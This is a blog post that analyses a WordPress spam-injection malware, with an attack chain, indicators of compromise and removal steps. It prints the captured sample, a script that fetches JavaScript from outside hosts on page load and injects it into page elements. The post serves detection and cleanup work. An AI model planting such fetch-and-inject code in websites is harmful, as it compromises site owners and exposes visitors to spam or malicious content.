DEV Community

MD Pabel
MD Pabel

Posted on • Originally published at mdpabel.com on

JavaScript Fetch-Based Spam Injection

#cybersecurity #javascript #security #wordpress

Technical Analysis

The malicious code utilizes the JavaScript fetch function to load external scripts from dubious URLs. These scripts are then injected into the site dynamically via the document's inner HTML properties. The code likely masquerades as a legitimate part of a WordPress theme, making it unsusceptible to basic scanners. The malware gets hidden within theme files, leveraging the fetch function to avoid direct script inclusion that simple scanners might catch.

VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.

Attack Chain

  1. Step 1: The malicious script is embedded within the theme database, pretending to be legitimate or obfuscated as normal theme operations.
  2. Step 2: Upon page load, the JavaScript fetch API is called to pull external scripts from spammy URLs.
  3. Step 3: The fetched contents are injected into specific HTML elements, inserting potentially harmful or deceptive content into the webpage.

Code Signature(s)

FILE: malware-sample.js 

<script><!-- [et_pb_line_break_holder] --> fetch('https://sengatanlebah.shop/back.js').then((resp) => resp.text()).then(y => document.getElementById("datax").innerHTML=y);<!-- [et_pb_line_break_holder] --> fetch('https://jasabacklink.buzz/backlink/sigma.js').then((resp) => resp.text()).then(y => document.getElementById("info1").innerHTML=y);<!-- [et_pb_line_break_holder] --> fetch('https://jasabacklink.buzz/backlink/teratai.js').then((resp) => resp.text()).then(y => document.getElementById("info2").innerHTML=y);<!-- [et_pb_line_break_holder] --></script>
Enter fullscreen mode Exit fullscreen mode

Indicators of Compromise (IOCs)

  • sengatanlebah.shop/back.js
  • jasabacklink.buzz/backlink/sigma.js
  • jasabacklink.buzz/backlink/teratai.js

Removal Protocol

  1. Step 1: Identify and access affected theme file(s), usually .php or .js files within the theme directory.
  2. Step 2: Remove any suspicious fetch calls or similar JavaScript code fetching from external domains not owned by you.
  3. Step 3: Verify the integrity of your WordPress theme by comparing it against a clean, original version and restore any compromised files.

Status: Active Threat.

Verification: Verified by MD Pabel.

Top comments (0)